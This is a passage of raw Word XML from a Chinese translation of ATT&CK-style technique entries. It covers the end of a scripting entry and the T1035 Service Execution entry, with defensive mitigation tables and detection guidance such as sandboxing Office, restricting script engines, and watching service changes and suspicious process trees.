          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>etasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ei</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。渗透测试人员常常在漏洞攻击时和攻击后操作中使用这</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>三种框架</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多可用于规避防御的功能。有些攻击者会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDF6A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="1D227F0D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6EAC622C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="663F1556" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="73D2533A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F70E466" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>应用隔离</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38F6EC41" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Office</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>安全设置来启用“受保护视图”，在沙箱环境中执行，以及通过组策略阻止宏。也可通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>其他类型的虚拟化和应用微</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分区来缓解攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="19356C21" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66CFBB33" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特性</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>程序禁用或</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A4D795B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>关闭未使用的功能或限制对脚本引擎（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VBScript</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）或脚本化管理框架（如</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）的访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31820030" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634DEEE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2057B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本编程可能在管理员、开发人员或高级用户系统上很常见，具体取决于作业功能。如果对普通用户限制了脚本编写，那么任何在系统上运行脚本的尝试都将被视为可疑。如果脚本在系统上不常用但已启用，那么由于打补丁或其他管理员功能而超出周期的脚本是可疑的。应尽可能从文件系统中捕获脚本以确定其操作和意图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77290E0E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本可能会在可生成事件的系统上执行操作且</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>效果各有不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，具体取决于所使用的监控类型。监控脚本执行和后续行为所涉及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程和命令行参数。操作可能与网络和系统信息发现、收集或其他攻击后脚本化行为相关，并可用作返回源脚本的检测指标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D2F23" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析可能带恶意宏的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件附件。执行宏可能会创建可疑的进程树，具体取决于宏的设计目的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winword.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成实例，脚本应用程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wscript.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或其他可疑进程可能表示存在恶意活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD63BE3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1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81"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="221CF59B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC45C24" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1035</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0FA179" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B29B56" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26FE202A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E24B0A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6099650F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C6D66C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C070543" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4461BFE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务交互的方法（例如服务控制管理器）执行二进制文件、命令或脚本。这可以通过创建新服务或修改现有服务来完成。此技术与创建新服务和修改现有服务一起使用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务持久性或权限升级。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B84E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2578"/>
        <w:gridCol w:w="7158"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="04970906" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="55F5EA5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7158" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="562C827E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7F9ED42E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3141D836" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7158" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46106FD3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保禁止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>需较高权限级别才能运行的服务由</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限级别较低的用户创建或与之交互。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="02B5BC54" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B3EE372" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7158" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06A85446" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>还要确保具有较低权限级别的用户不能替换或修改高权限级别的服务二进制文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11068D27" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4361D235" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA1F36" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改服务注册表项和通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>命令行调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能用来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>修改与已知软件、补丁周期等不相干服务的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果服务仅用于执行二进制文件或脚本而不用于持久化，则很可能在服务重新启动后不久便将其更改回原来的形式，这样服务就不会像使用管理员工具</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00671A0D">
          <w:t>PsExec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时那样遭到破坏。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C19EE" w14:textId="64B4EB57" w:rsidR="000F2665" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>签名</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00B37DBE">
        <w:rPr>
